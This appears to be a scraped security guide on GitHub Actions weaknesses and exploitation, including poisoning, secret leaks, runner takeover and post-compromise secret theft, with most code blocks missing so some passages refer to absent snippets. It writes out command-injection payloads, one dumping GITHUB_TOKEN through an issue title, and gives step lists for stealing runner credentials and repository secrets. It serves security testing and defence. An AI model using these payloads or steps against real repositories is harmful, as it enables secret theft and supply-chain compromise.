GitHub Actions
Allowed unsecure commands
There are deprecated set-env
and add-path
workflow commands that can be explicitly enabled by setting the ACTIONS_ALLOW_UNSECURE_COMMANDS
environment variable to true
.
set-env
sets environment variables via the following workflow command::set-env name=<NAME>::<VALUE>
add-path
updates thePATH
environment variable via the following workflow command::add-path::<VALUE>
Depending on the use of the environment variable, this could allow an attacker, in the worst case, to change the path and run a command other than the intended one, leading to arbitrary command execution. For example, consider the following workflow:
The above workflow enables unsecure commands by setting ACTIONS_ALLOW_UNSECURE_COMMANDS
to true
in the env
section. As can be seen, the first step of the deploy
job prints the github
context to the workflow log. Since part of the variables in the github
context is user-controlled, it is possible to abuse unsecure commands to set arbitrary environment variables. For instance, an attacker could use the pull request description to deliver the following payload, which will reset the ENVIRONMENT_NAME
when the github
context is printed:
GitHub Runner will process this line as a workflow command and save a malicious payload to ENVIRONMENT_NAME
. As a result, injecting the ENVIRONMENT_NAME
variable within the actions/github-script
step will lead to code injection.
References:
Artifact poisoning
There are many different cases where workflows use artifacts created by other workflows, for example, to get test results, a compiled binary, metrics, changes made, a pull request number, etc. This opens up another source for payload delivery. As a result, if an attacker can control the content of the downloaded artifacts and that content is not properly validated, it may lead to the execution of arbitrary commands. For example, consider the following workflows:
As can be seen, the first workflow uses the pull_request
event to build a binary from an incoming pull request and upload the compiled binary to the artifacts. Since the workflow uses pull_request
it can be triggered by a third-party user from a fork. Therefore, it is possible to upload a malicious binary to the artifacts. The second workflow uses the workflow_dispatch
, downloads the binary from the pr.yml
workflow and runs the binary. Even though the run.yml
workflow is triggered manually, an attacker could execute arbitrary commands if they poisoned the artifacts just before triggering run.yml
. In this case, the attack flow can look like this:
An attacker forks the repository and makes malicious changes.
An opens a pull request to the base repository.
The
pr.yml
workflow checks out the code from the pull request, builds it and uploads the malicious binary to the artifacts.A maintainer triggers the
run.yml
workflow.The workflow downloads the malicious binary and runs it.
References:
How to detect downloading artifacts?
There are several ways to download artifacts from another workflow. The most common ones can be found below:
Using the
github.rest.actions.listWorkflowRunArtifacts()
method within theactions/github-script
action:Using the
gh run download
GitHub CLI command:Using the
gh api
GitHub CLI command withgithub.event.workflow_run.artifacts_url
:
Cache poisoning
As a result, whatever is cached from an incoming pull request will be available in all workflows. You can reproduce this behaviour using the steps below.
Poisoning:
Create a workflow in a base repository with the next content:
Fork the repository and add
poison
file with arbitrary content.Create a pull request to the base repository and wait for the workflow to complete.
Exploitation:
Create a new branch in the base repository and change any file.
Create a pull request to the base branch.
The workflow will retrieve the
poison
file from the step 2 of thePoisoning
section above.
Cache and deployment environments
GitHub Runner registration token disclosure
The GitHub Runner registration token is a short-term token that has a 1 hour expiration time and it looks like this:
In the case of a GitHub Runner registration token disclosure, an attacker can register a malicious runner, take over jobs, and gain full access to secrets and code.
You can use the next request to check a registration token:
Disclosure of sensitive data
References:
Printing sensitive output to workflow logs
The following example prints sensitive data received from the /user
endpoint:
Running commands in the verbose or debug mode
The following example leaks the Auth-Token
header due to the curl verbose -v
key:
Misuse of sensitive data in workflows
The following example does not mark TOKEN
as sensitive using add-mask
and curl
will expose the TOKEN
to the logs:
In the snippet below, an attacker could use the pull request description to deliver a payload and stop workflow command processing, which will cause the token to be exposed despite the add-mask
being used.
The payload may look like this:
Misuse of secrets in reusable workflows
When a job is used to call a reusable workflow, jobs.<job_id>.secrets
can be used to provide a map of secrets that are passed to the called workflow. Under certain circumstances, the misuse of secrets can lead to the disclosure of sensitive data.
Consider the following workflows:
The dispatch.yml
workflow invokes the reusable.yml
reusable workflow and passes AWS_ACCESS_KEY_ID
and AWS_SECRET_ACCESS_KEY
using the creds
secrets. The reusable.yml
workflow parses the creds
secrets and extracts the AWS_SECRET_ACCESS_KEY
and AWS_SECRET_ACCESS_KEY
. Even though ${{ secrets.creds }}
is masked in the logs, and AWS_SECRET_ACCESS_KEY
and AWS_SECRET_ACCESS_KEY
are stored in encrypted secrets, reusable.yml
will reveal the ID and key in plain text.
Below you can find one of the in-wild examples where the docker/build-push-action
parses the npm credentials from the build_args
and leaks them into the logs:
Misuse of secrets in manual workflows
If the workflow_dispacth
workflow receives secrets in the inputs
context and does not mask them, with a high degree of probability the secrets will leak into the workflow log.
For example, the following workflow gets a token from the inputs
context and reveals that token in the workflow log, passing the token to environment variables:
Output parameters and debug mode
The following example will leak the tokens into the workflow logs if the debug
mode is enabled:
The workflow log discloses the token in plaintext:
Workflow artifacts
Workflow cache
Contexts misusing
The list below contains user-controlled GitHub context variables for various events.
The outputs
property contains the result/output of a specific job or step. outputs
may accept user-controlled data which can be passed to the run:
block. In the following example, an attacker can execute arbitrary commands by creating a pull request named `;arbitrary_command_here();//
because steps.fetch-branch-names.outputs.prs-string
contains a pull request title:
References:
Potentially dangerous third-party actions
Remember that injecting user-controlled data into variables of third-party actions can lead to vulnerabilities such as commands or code injection. Below you can find a list of the most common actions which, if misused, can lead to vulnerabilities.
Write workflows scripting the GitHub API in JavaScript
Using variable interpolation ${{ }}
with script:
can lead to JavaScript code injection
A GitHub Action to send queries to GitHub's GraphQL API
Using variable interpolation ${{ }}
with query:
can lead to injection to a GraphQL request
A GitHub Action to send arbitrary requests to GitHub's REST API
Using variable interpolation ${{ }}
with route:
can lead to injection to a request to REST API
Misconfiguration of OpenID Connect
With OpenID Connect, a GitHub Actions workflow requires a token to access resources in a cloud provider. The workflow requests an access token from a cloud provider, which checks the details presented by the JWT. If the trust configuration in the JWT is a match, a cloud provider responds by issuing a temporary token to the workflow, which can then be used to access resources in a cloud provider.
When developers configure a cloud to trust GitHub's OIDC provider, they must add conditions that filter incoming requests, so that untrusted repositories or workflows can't request access tokens for cloud resources. Audience
and Subject
claims are typically used in combination while setting conditions on the cloud role/resources to scope its access to the GitHub workflows.
Audience
: By default, this value uses the URL of the organization or repository owner. This can be used to set a condition that only the workflows in the specific organization can access the cloud role.Subject
: Has a predefined format and is a concatenation of some of the key metadata about the workflow, such as the GitHub organization, repository, branch or associated job environment. There are also many additional claims supported in the OIDC token that can also be used for setting these conditions.
However, if a cloud provider is misconfigured, untrusted repositories can request access tokens for cloud resources.
References:
Misuse of the events related to incoming pull requests
GitHub workflows can be triggered by events related to incoming pull requests. The table below contains all the events that can be used to handle incoming pull requests:
Event
REF
Possible GITHUB_TOKEN
permissions
Access to secrets
PR merge branch
read
no
PR merge branch
write
yes
PR base branch
write
yes
Default branch
write
yes
Default branch
write
yes
Workflows triggered via
pull_request_target
have write permissions to the target repository and have access to target repository secrets. The same is true for workflows triggered onpull_request
from a branch in the same repository, but not from external forks. The reasoning behind the latter is that it is safe to share the repository secrets if the user has write permissions to the target repository already.pull_request_target
runs in the context of the target repository of the pull request, rather than in the merge commit. This means the standard checkout action uses the target repository to prevent accidental usage of a user-supplied code.
Normally, using pull_request_target
, issue_comment
or workflow_run
is safe because actions only run code from a target repository, not an incoming pull request. However, if a workflow uses these events with an explicit checkout of a pull request, it can lead to untrusted commands or code execution.
There are several ways to check out a code from a pull request:
Explicitly checking out using
git
in therun:
block.Use GitHub API or third-party actions:
The following context variables may help to find cases where an incoming pull request is checked out:
References:
Confusion between head.ref and head.sha
Sometimes developers implement workflows in such a way that they require manual review before execution. It is guaranteed that untrusted content will be reviewed by a maintainer before execution. Consider the following workflow:
As can be seen, the workflow is triggered when the approved
label is set on a pull request. In other words, only a maintainer with write permissions can manually trigger this workflow. However, the workflow is still vulnerable, because it uses github.event.pull_request.head.ref
to check out the repository content. Consider the difference between head.ref
and head.sha
. head.ref
points to a branch while head.sha
points to a commit. This means that if head.sha
is used to check out a repository, the content will be fetched from the commit that was used to trigger the workflow. In the case of labeling a pull request, it will be the HEAD commit that was reviewed by a maintainer before the label was set. However, if head.ref
is used, a repository is checked out from the base branch. As a result, an attacker can inject a malicious payload right after the manual approval (TOCTOU attack). The attack flow may look like this:
An attacker forks a target repository.
An attacker makes valid changes and opens a pull request.
An attacker waits for the label to be set.
A maintainer sets the
approved
label that triggers the vulnerable workflow.An attacker pushes a malicious payload to the fork.
The workflow checks out the malicious payload and executes them.
Misuse of the pull_request_target event in non-default branches
The pull_request_target
event can be used to trigger workflows in non-default branches if there is no restriction based on branches
and branches-ignore
filters.
GitHub uses the workflow from a non-default branch when creating a pull request to that branch. Therefore, if there is a vulnerable workflow in a non-default branch that can be triggered by the pull_request_target
event, an attacker can open a pull request to that branch and exploit a vulnerability.
This is a common pitfall when fixing vulnerabilities, developers can only fix a vulnerability in the default branch and leave the vulnerable version in non-default branches.
Misuse of the workflow_run event
Nevertheless, there are still ways of transferring data controlled by a user from untrusted pull requests to a privileged workflow_run
workflow context:
References:
Misuse of self-hosted runners
As a result, an ephemeral runner has the following lifecycle:
The runner is registered with the GitHub Actions service.
The runner takes one job and performs it.
When the runner completes the job, it cleans up the local environment (
.runner
,.credentials
,.credentials_rsaparams
files).The GitHub Actions service automatically de-registers the runner.
Therefore, if an attacker gains access to an ephemeral self-hosted runner, they will not be able to affect other jobs.
However, self-hosted runners are not launched as ephemeral by default and there is no guarantee around running in an ephemeral clean virtual environment. So, runners can be persistently compromised by untrusted code in a workflow. An attacker can abuse a workflow to access the following files that are stored in a root folder of a runner host:
.runner
that contains general info about a runner, such as an id, name, pool id, etc..credentials
that contains authentication details such as the scheme used and authorization URL..credentials_rsaparams
that contains the RSA parameters that were generated during the registration and are used to sign JWT tokens.
These files can be used to takeover a self-hosted runner with the next steps:
Fetch
.runner
,.credentials
,.credentials_rsaparams
files with all the necessary data written during the runner registration.Get an access token using the following request:
Where:
UUID
can be found in the.credentials
file.
Remove a current session:
Where:
RANDOM_PREFIX
can be found in the.runner
file.SESSION_ID
is a session ID that can be found in the_diag/Runner_<DATE>-utc.log
file with the runner logs.BEARER_TOKEN
is a bearer token from the response in the previous step.
Copy the
.runner
,.credentials
,.credentials_rsaparams
files to a root folder of a malicious runner.Run a malicious runner.
The takeover has the greatest impact when a self-hosted runner is defined at the organization or enterprise level because GitHub can schedule workflows from multiple repositories onto the same runner. It allows an attacker to gain access to the jobs which will use the malicious runner.
References:
Using the pull_request event with self-hosted runners
References:
Detection of the use of self-hosted runners
self-hosted
default label applied to all self-hosted runners.linux
,windows
, ormacOS
applied depending on an operating system.x64
,ARM
, orARM64
applied depending on hardware architecture.
Using vulnerable actions
There are three types of actions:
Composite action
Command injection
As a result, it is possible at least extract secrets from environment variables and generated shell scripts. For instance, in the snippet below an attacker can open an issue with title ";{cat,/home/runner/work/_temp/$({xxd,-r,-p}<<<2a)}|{base64,-w0};#
to dump GITHUB_TOKEN
:
Disclosure of sensitive data
JavaScript action
Command injection
Disclosure of sensitive data
The workflow log discloses the token in plaintext:
Github context
The next variables in the GitHub context are controlled by a user:
context.payload.pull_request.title
context.payload.pull_request.body
context.payload.pull_request.head.ref
context.payload.pull_request.head.label
context.payload.pull_request.head.repo.default_branch
context.payload.pull_request.head.repo.description
context.payload.pull_request.head.repo.homepage
context.payload.issue.body
context.payload.issue.title
context.payload.comment.body
context.payload.discussion.body
context.payload.discussion.title
These variables can be used as a source to pass arbitrary data to vulnerable code.
Octokit GraphQL API injection
Octokit REST API injection
Docker action
Disclosure of sensitive data
Using a malicious docker image
In addition to a local Dockerfile
in a repository, third-party Docker images from a registry can be used. Therefore, these Docker images may be vulnerable, causing the container to be compromised.
References:
Sensitive mounts
Github runner passes part of the environment variables and mounts volumes when running a Docker container:
Here it is worth paying attention to at least the following things:
Unclaimed actions
Third-party actions may be available for claiming because the namespace (username or organization name) has been changed or removed. If the namespace has been changed GitHub will redirect the old namespace to the new one and thus workflows that use the actions with the old namespace will continue to execute successfully. In this case, an attacker can try to claim the old namespace by registering a user or creating an organization. If it is possible, an attacker can create a malicious action which will later be executed by workflows that use actions with the claimed namespace.
References:
Reusing vulnerable workflows
The reusable workflow from the snippet above is vulnerable to command injection. If the username
input variable will be controlled by an attacker, they can leak envPAT
using the following payload as username
:
Another example is the following workflow which checkouts a code from an incoming PR and runs npm install
against it:
References:
Vulnerable if-conditions
The if
condition is used in a workflow file to determine whether a step should run. When an if
conditional is true
, the step will run. It can be useful from a security perspective as well. For example, the following if
statement can be used to allow only pull requests from the base repository:
However, these if
conditions can be vulnerable and lead not to the behavior that is originally expected.
Incorrect comparison
GitHub provides the contains()
function that can be used in an if
condition incorrectly. For example in the following example, an author has restricted the execution of the step to only bots using contains()
:
However, this condition can be easily met by creating a new bot.
Labels on PRs
One approach to control the workflow execution is to use labels on pull requests. This is possible because a label on a pull request can only be set by a project member. As a result, it allows running a workflow only after a project member has reviewed a pull request and set an appropriate label:
Create a pull request with valid changes.
Wait for the label to be set.
Update the pull request with malicious code.
The updates will trigger the workflow.
Misusing context variables
Using wrong context variables can cause if
condition to always be true
or false
regardless of the situation. For example, the following if
condition uses github.event.pull_request.base.repo.full_name
instead of github.event.pull_request.head.repo.full_name
variable to ignore pull requests from forks:
However, this condition will be always true
. The same behaviour will be achieved if github.repository
is used for comparing against the repository name:
Skipping mandatory checks
A workflow can implement various types of checks during running. For example, it can check if an actor is a member of an organization or if they have write permissions for the current repository. This can be done using third-party actions or a custom validation based on the GitHub API. However, not all such actions interrupt execution if a check fails, some of them return a boolean value for subsequent verification. For instance, the following snippet shows a check for the presence of an actor in an org team:
Nevertheless, the snippet above is vulnerable because there is no the id:
field for the Fetch team member list
step. As a result, ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }}
is always false
. So, the fixed version looks like the following:
Unclaimed or incorrect usernames
If the workflow uses something like this:
Make sure all these users exist as they may have already been deleted or misspelled.
The potential impact of a compromised runner workflow
References:
Accessing secrets through environment variables
If secrets are passed to an environment variable, you can directly access them in the following ways:
Accessing secrets from the run: step
If a secret is used directly in an expression ${{ }}
in the run:
block, like:
The generated shell script will be stored on the disk in the /home/runner/work/_temp/
folder. This script contains the secret in plain text because GitHub Runner evaluates the expressions inside of ${{ }}
and substitutes them with the resulting values before running the script in the run:
block. Therefore, the secret can be accessed with the following command:
Accessing secrets through rewriting third-party actions
If you have an arbitrary command execution in front of a third-party action that handles secrets:
You can steal secrets by rewriting third-party action code. GitHub Runner checks out all third-party action repositories during the Set up
step and saves them to the /home/runner/work/_actions/
folder. For example, fakeaction/publish@v3
will be checked out to the /home/runner/work/_actions/fakeaction/publish/v3/
folder. Therefore, you can rewrite a third-party action with a malicious one using command injection to access secrets.
The easiest way is to override the action.yml
file with a composite action that leaks secrets:
Leaking repository and organization secrets by adding a malicious workflow
GitHub no longer allows modifying files in the .github/workflows
folder or merging a branch from forks with changes in the .github/workflows
folder using GITHUB_TOKEN
. You need a personal access token with repo
and workflow
scopes to be able to add a malicious workflow.
Usually, non-default branches have no branch protection rules. If you have access to GITHUB_TOKEN
with the pull_requests:write
scope, you can add an arbitrary workflow to a non-default branch. Since the pull_request_target
workflow in non-default branches can be triggered by a user, you can leak all repository and organization secrets using the following steps:
Fork the target repo.
Add a malicious
pull_request_target
workflow:Create a pull request to a non-default branch.
Merge the pull request using
GITHUB_TOKEN
withpull_requests:write
scope:After merging the pull request open a pull request to the non-default branch from the fork.
Wait for the malicious workflow to complete.
It will leak all secrets to the logs.
If GITHUB_TOKEN
has the contents:write
scope, you can create a new non-default branch using the following API request:
Exfiltrating secrets from a runner
An attacker can exfiltrate any stored secrets or other data from a runner. Actions and scripts may store sensitive data on the filesystem:
.git/config
actions/checkout
action by default stores the repository token in a .git/config
file unless the persist-credentials: false
argument is set
$HOME/.jira.d/credentials
$HOME/.azure
Azure/login
action by default use the Azure CLI for login, that stores the credentials in $HOME/.azure
folder
$HOME/.docker/config.json
$HOME/.docker/config.json
$HOME/.docker/config.json
$GITHUB_WORKSPACE/gha-creds-<RANDOM_FILENAME>.json
$HOME/.terraformrc
Exfiltrating secrets from memory
Any secrets that are used by a workflow are passed to the GitHub Runner at startup; therefore secrets are placed in the process's memory. You can try to exfiltrate secrets from the memory dump.
You can use the following script to dump the memory and find GITHUB_TOKEN
:
Approving pull requests
You can grant write permissions on the pull requests API endpoint and use the API to approve a pull request. It can be used to bypass branch protection rules when a main branch requires 1 approval and does not require review from code owners.
For instance, if you can write to non-main branches of a repository, you can bypass the protection using the next steps:
Create a branch and add the following workflow:
Create a pull request.
The pull request will require approval.
Once the action is complete,
github-actions
bot will approve the changes.You can merge the changes to the main branch.
Modifying the contents of a repository
References:
Access cloud services via OpenID Connect
If a vulnerable workflow has the GITHUB_TOKEN
with the id-token:write
scope you can request the OIDC JWT ID token to access cloud resources.
References:
Trigger workflow_dispatch workflows
In the request above, you can control workflow arguments using the inputs
parameter. If a workflow does not properly handle data from the inputs
context, you might get the command execution.
References:
Trigger repository_dispatch workflows
In the request above, you can control workflow arguments using the client_payload
parameter. If a workflow does not properly handle data from the github.event.client_payload
context, you might get the command execution.
References:
Last updated